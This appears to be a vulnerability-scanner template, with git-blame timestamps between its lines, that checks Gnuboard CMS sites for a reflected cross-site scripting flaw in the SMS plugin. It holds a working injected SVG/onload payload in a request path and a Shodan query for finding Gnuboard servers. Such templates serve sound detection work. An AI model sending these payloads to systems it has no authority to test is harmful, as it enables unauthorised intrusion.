2022-05-10 04:22:31 +00:00
id : gnuboard-sms-xss
info :
2022-09-21 21:42:27 +00:00
name : Gnuboard CMS - Cross-Site Scripting
2022-05-10 04:22:31 +00:00
author : gy741
severity : medium
2022-09-21 21:42:27 +00:00
description : Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
2022-05-10 04:22:31 +00:00
reference :
- https://sir.kr/g5_pds/4788?page=5
- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
2022-09-21 21:42:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-05-12 19:41:32 +00:00
metadata :
verified : true
shodan-query : http.html:"Gnuboard"
2022-05-10 04:22:31 +00:00
tags : xss,gnuboard
requests :
- method : GET
path :
2022-05-12 19:41:32 +00:00
- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
2022-05-10 04:22:31 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-05-12 19:41:32 +00:00
words :
- '"0nuboard<svg onload=alert(document.domain)>"'
2022-05-10 04:22:31 +00:00
- type : word
2022-05-12 19:41:32 +00:00
part : header
2022-05-10 04:22:31 +00:00
words :
- "text/html"
2022-05-12 19:41:32 +00:00
- type : status
status :
- 200
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/19
